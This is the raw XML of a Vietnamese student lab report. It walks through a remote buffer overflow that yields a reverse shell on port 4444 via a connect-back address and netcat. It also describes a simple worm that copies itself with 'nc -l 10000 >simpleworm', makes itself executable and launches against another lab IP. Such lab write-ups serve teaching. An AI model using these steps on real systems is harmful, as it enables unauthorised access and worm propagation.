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DA25C" w14:textId="7CED55A2" w:rsidR="00EC4BD3" w:rsidRDefault="00EC4BD3">
      <w:r w:rsidRPr="00D904BF">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>C.2 Remote Buffer Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363455C0" w14:textId="7E16293C" w:rsidR="00EC4BD3" w:rsidRDefault="00EC4BD3" w:rsidP="00EC4BD3">
      <w:r w:rsidRPr="00EC4BD3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3338D91D" wp14:editId="3EAFC33D">
            <wp:extent cx="5731510" cy="3150870"/>
            <wp:effectExtent l="0" t="0" r="254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50870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC61AE1" w14:textId="69FB4A1A" w:rsidR="00EC4BD3" w:rsidRDefault="00EC4BD3" w:rsidP="00EC4BD3">
      <w:r>
        <w:t>2. Trên máy chủ, chúng ta thao tác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609E265C" w14:textId="43261FF2" w:rsidR="00EC4BD3" w:rsidRDefault="00EC4BD3" w:rsidP="00EC4BD3">
      <w:r w:rsidRPr="00EC4BD3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28A46194" wp14:editId="4AFE3453">
            <wp:extent cx="5731510" cy="957580"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="3" name="Hình ảnh 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Ảnh có chứa văn bản&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="957580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E324FA4" w14:textId="7A9EDFF5" w:rsidR="00D904BF" w:rsidRDefault="00D904BF" w:rsidP="00D904BF">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Trên máy client ta telnet tới máy server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9CCE29" w14:textId="62BE6A1A" w:rsidR="00D904BF" w:rsidRDefault="00D904BF" w:rsidP="00D904BF">
      <w:r w:rsidRPr="00D904BF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FB4D088" wp14:editId="66B0DFEC">
            <wp:extent cx="5707875" cy="1272650"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="5" name="Hình ảnh 5"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descr="Ảnh có chứa văn bản&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5707875" cy="1272650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BF6057" w14:textId="759DF9F1" w:rsidR="00D904BF" w:rsidRDefault="00D904BF" w:rsidP="00D904BF">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Bên máy server khi nhận được kết nối sẽ trả về cho ta IP của máy kết nối và địa chỉ của buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC14DDC" w14:textId="5722798E" w:rsidR="00D904BF" w:rsidRDefault="00D904BF" w:rsidP="00D904BF">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
      </w:pPr>
      <w:r w:rsidRPr="00D904BF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="609E1826" wp14:editId="2C11594D">
            <wp:extent cx="4267570" cy="586791"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="6" name="Hình ảnh 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Ảnh có chứa văn bản&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4267570" cy="586791"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F6ACDA" w14:textId="18E2CB89" w:rsidR="00D904BF" w:rsidRDefault="00D904BF" w:rsidP="00D904BF">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
      </w:pPr>
      <w:r w:rsidRPr="00D904BF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FA7002A" wp14:editId="31586B49">
            <wp:extent cx="5731510" cy="4431665"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="7" name="Hình ảnh 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descr="Ảnh có chứa văn bản&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4431665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F397E3" w14:textId="29D8829B" w:rsidR="00D904BF" w:rsidRDefault="00D904BF" w:rsidP="00D904BF">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Trên máy server ta tiến hành kết nối tới máy server thông qua port 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018B6B96" w14:textId="27FC60CB" w:rsidR="00D904BF" w:rsidRDefault="00D904BF" w:rsidP="00D904BF">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
      </w:pPr>
      <w:r w:rsidRPr="00D904BF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="181A0A9D" wp14:editId="0E5D7B53">
            <wp:extent cx="5731510" cy="321310"/>
            <wp:effectExtent l="0" t="0" r="2540" b="254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1310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAA5C4A" w14:textId="0A2E35B1" w:rsidR="00D904BF" w:rsidRDefault="00D904BF" w:rsidP="00D904BF">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trong file remoteexploit.c ta chỉnh sửa địa chỉ trả về để có thể overflow ở đây là 0xbffff2ed là giá trị 0xbffff2e4 sau khi cộng thêm </w:t>
      </w:r>
      <w:r w:rsidR="003039F1">
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> byte để ghi đè địa chỉ của old ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A37498" w14:textId="1E3BC550" w:rsidR="003039F1" w:rsidRDefault="003039F1" w:rsidP="003039F1">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Trên hệ điều hành Ubuntu Server 14.04 32-bit, độ dài của địa chỉ là 4 byte (32 bit). Khi sử dụng tùy chọn -mpreferred-stack-boundary=2 trong lệnh biên dịch, stack frame của hàm sẽ có độ dài là 16 byte và địa chỉ trả về mới sẽ được lưu trên 4 byte cuối cùng của stack frame đó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70743F88" w14:textId="6D600361" w:rsidR="003039F1" w:rsidRDefault="003039F1" w:rsidP="003039F1">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Do đó, nếu muốn ghi đè địa chỉ trả về cũ, cần ghi thêm 4 byte nữa sau địa chỉ trả về mới để đảm bảo rằng địa chỉ trả về cũ đã bị ghi đè đúng cách. Vì vậy, tổng số byte cần thêm để ghi đè địa chỉ trả về cũ là 8 byte (4 byte địa chỉ trả về mới và 4 byte sau địa chỉ trả về mới để ghi đè địa chỉ trả về cũ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5474F656" w14:textId="735D0745" w:rsidR="00D904BF" w:rsidRDefault="00D904BF" w:rsidP="00D904BF">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
      </w:pPr>
      <w:r w:rsidRPr="00D904BF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52ECDA53" wp14:editId="63809085">
            <wp:extent cx="5403048" cy="1348857"/>
            <wp:effectExtent l="0" t="0" r="7620" b="381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3048" cy="1348857"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1ABB28" w14:textId="5B34E028" w:rsidR="003039F1" w:rsidRDefault="003039F1" w:rsidP="003039F1">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ta cũng cần sửa lại địa chỉ IP để khi máy server bị exploit thì nó sẽ connect back lại máy client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064E5F00" w14:textId="5B964743" w:rsidR="003039F1" w:rsidRDefault="003039F1" w:rsidP="003039F1">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
      </w:pPr>
      <w:r w:rsidRPr="003039F1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F38AF7B" wp14:editId="635A32BA">
            <wp:extent cx="5731510" cy="1809750"/>
            <wp:effectExtent l="0" t="0" r="254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09750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEA845A" w14:textId="772E0905" w:rsidR="003039F1" w:rsidRDefault="003039F1" w:rsidP="003039F1">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ta biên dịch và Thực hiện chạy file exploit trên terminal client1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA302A8" w14:textId="5A92E0EE" w:rsidR="003039F1" w:rsidRDefault="003039F1" w:rsidP="003039F1">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
      </w:pPr>
      <w:r w:rsidRPr="003039F1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FCBF7B5" wp14:editId="6B7E9134">
            <wp:extent cx="5731510" cy="522605"/>
            <wp:effectExtent l="0" t="0" r="254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22605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D464E9" w14:textId="1F536C64" w:rsidR="003039F1" w:rsidRDefault="003039F1" w:rsidP="003039F1">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Kết quả bên máy server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569216ED" w14:textId="0C91F24A" w:rsidR="003039F1" w:rsidRDefault="003039F1" w:rsidP="003039F1">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
      </w:pPr>
      <w:r w:rsidRPr="003039F1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5608B93A" wp14:editId="665740CA">
            <wp:extent cx="5731510" cy="720090"/>
            <wp:effectExtent l="0" t="0" r="2540" b="381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20090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69482F44" w14:textId="539D8F6B" w:rsidR="003039F1" w:rsidRDefault="003039F1" w:rsidP="003039F1">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Trên terminal máy client 2 ta mở netcat để lắng nghe từ port 4444 mà server đã connect back lại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689177C1" w14:textId="6E6400B1" w:rsidR="003039F1" w:rsidRDefault="003039F1" w:rsidP="003039F1">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
      </w:pPr>
      <w:r w:rsidRPr="003039F1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BA5EBD8" wp14:editId="7C49E0F8">
            <wp:extent cx="5731510" cy="2440305"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="13" name="Hình ảnh 1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ình ảnh 13" descr="Ảnh có chứa văn bản&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2440305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C4618B" w14:textId="7B4B2421" w:rsidR="003039F1" w:rsidRDefault="003039F1" w:rsidP="003039F1">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Khi khai thành công thì bên terminal 1 của client </w:t>
      </w:r>
      <w:r w:rsidR="00DB1232">
        <w:t>ta có được connect của server kết nối ngược lại máy client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9BB7B9" w14:textId="644372C6" w:rsidR="0013749D" w:rsidRDefault="0013749D" w:rsidP="0013749D">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0013749D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>C.3 Simple Worm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0614AAFD" w14:textId="6394C305" w:rsidR="0013749D" w:rsidRDefault="0013749D" w:rsidP="0013749D">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>- Ở mục tiêu này máy server sau khi bị nhiễm wrom và khai thác xong thì sẽ tiếp tục tự động thực thi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53031A5D" w14:textId="357FB390" w:rsidR="000F1297" w:rsidRDefault="000F1297" w:rsidP="0013749D">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="000F1297">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F186D6E" wp14:editId="672B1829">
            <wp:extent cx="5570703" cy="2438611"/>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0703" cy="2438611"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA19858" w14:textId="0C357F0E" w:rsidR="000F1297" w:rsidRDefault="000F1297" w:rsidP="0013749D">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>- Đây là đoạn code bổ sung để worm có thể lây nhiễm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BEACA2" w14:textId="63017EBA" w:rsidR="0013749D" w:rsidRDefault="0013749D" w:rsidP="0013749D">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>- Worm này cũng sẽ khai thác lỗ hổng buffer_overflow và connect back lại máy client tại port 4444</w:t>
      </w:r>
      <w:r w:rsidR="000F1297">
        <w:t xml:space="preserve"> như ở yêu cầu 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDD1451" w14:textId="4D174FAB" w:rsidR="000F1297" w:rsidRDefault="000F1297" w:rsidP="000F1297">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Sau khi có được connect back từ máy server </w:t>
      </w:r>
      <w:r>
        <w:t>client sẽ gửi 1 chuỗi “</w:t>
      </w:r>
      <w:r w:rsidRPr="000F1297">
        <w:t>nc -l 10000 &gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">simpleworm” đến máy </w:t>
      </w:r>
      <w:r>
        <w:t>server để yêu cầu mở port 10000 và lưu dữ liệu nhận được vào 1 file tên là “simpleworm”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A857943" w14:textId="71E74FE1" w:rsidR="000F1297" w:rsidRDefault="000F1297" w:rsidP="000F1297">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>- Sau đó chờ 10 giây để đảm bảo nhận được đầy đủ dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B441F57" w14:textId="662ABECD" w:rsidR="000F1297" w:rsidRDefault="000F1297" w:rsidP="000F1297">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>- Sau đó tại máy client ta sử dụng system để mở kết nối tới máy client qua port 10000 “</w:t>
      </w:r>
      <w:r w:rsidRPr="000F1297">
        <w:t>nc 192.168.136.135 10000 &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>simpleworm” và gửi dữ liệu từ tệp simpleworm đến máy server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A203EB7" w14:textId="390A4026" w:rsidR="000F1297" w:rsidRDefault="000F1297" w:rsidP="000F1297">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>- Ta gửi chuỗi “</w:t>
      </w:r>
      <w:r w:rsidRPr="000F1297">
        <w:t>chmod +x simpleworm\x0A",</w:t>
      </w:r>
      <w:r>
        <w:t>20” để cấp quyền thực thi cho worm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D17FBDF" w14:textId="1D547451" w:rsidR="000F1297" w:rsidRDefault="000F1297" w:rsidP="000F1297">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>- Sau đó máy server sẽ trở thành 1 máy giống như client và sẽ thực thi file simpleworm để kết nối đến máy 192.168.136.137 port 6000 “</w:t>
      </w:r>
      <w:r w:rsidRPr="000F1297">
        <w:t xml:space="preserve">./simpleworm 192.168.136.137 </w:t>
      </w:r>
      <w:r>
        <w:t>6000” để có thể tiếp tục lây nhiễm nếu như máy đó cũng bị lỗi buffer_overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14337052" w14:textId="45D8D936" w:rsidR="000F1297" w:rsidRDefault="000F1297" w:rsidP="000F1297">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Do ở đây code em vẫn thực thi bình thường nhưng không hiểu vì lí do gì mà nó không mở kết nối để gửi và nhận file simpleworm từ máy client đến server nên ở đây em sẽ khai thác </w:t>
      </w:r>
      <w:r w:rsidR="00783357">
        <w:t>và lây nhiễm worm bằng tay worm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6402C7A8" w14:textId="7B943AD9" w:rsidR="00783357" w:rsidRDefault="00783357" w:rsidP="000F1297">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00783357">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00A29ED5" wp14:editId="03D4B6B6">
            <wp:extent cx="5731510" cy="1753235"/>
            <wp:effectExtent l="0" t="0" r="254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753235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED4AA52" w14:textId="70D3D548" w:rsidR="00783357" w:rsidRDefault="00783357" w:rsidP="00783357">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Các bước ban đầu thì tương tự như ở yêu cầu 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C713D2" w14:textId="78654BB3" w:rsidR="00783357" w:rsidRDefault="00783357" w:rsidP="00783357">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00783357">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6115FC0D" wp14:editId="23735976">
            <wp:extent cx="5616427" cy="914479"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="14" name="Hình ảnh 14"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ình ảnh 14" descr="Ảnh có chứa văn bản&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5616427" cy="914479"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62845C9F" w14:textId="3D4364DB" w:rsidR="00783357" w:rsidRDefault="00783357" w:rsidP="00783357">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sau đó tại máy server ta mở port 10000 và lưu dữ liệu nhận được vào file simpleworm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3B4BA7" w14:textId="5F5966F8" w:rsidR="00783357" w:rsidRDefault="00783357" w:rsidP="00783357">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00783357">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03D01D2D" wp14:editId="61FBFC18">
            <wp:extent cx="5723116" cy="2232853"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15" name="Hình ảnh 15"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ình ảnh 15" descr="Ảnh có chứa văn bản&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5723116" cy="2232853"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F44BAE" w14:textId="08628F64" w:rsidR="00783357" w:rsidRDefault="00783357" w:rsidP="00783357">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tại máy client ta mở kết nối và gửi dữ liệu từ file simpleworm đến máy server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5A114B" w14:textId="1980F34B" w:rsidR="00783357" w:rsidRDefault="00783357" w:rsidP="00783357">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00783357">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03023EB2" wp14:editId="082BD9DB">
            <wp:extent cx="5197290" cy="1089754"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="16" name="Hình ảnh 1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ình ảnh 16" descr="Ảnh có chứa văn bản&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5197290" cy="1089754"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF51410" w14:textId="76BEA3FC" w:rsidR="00783357" w:rsidRPr="003042D7" w:rsidRDefault="00783357" w:rsidP="00783357">
      <w:pPr>
        <w:pStyle w:val="oancuaDanhsach"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Bên server đã nhân được file simpleworm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42980850" w14:textId="5B69C1EC" w:rsidR="003042D7" w:rsidRDefault="003042D7" w:rsidP="003042D7">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="003042D7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03416FA0" wp14:editId="11D37598">
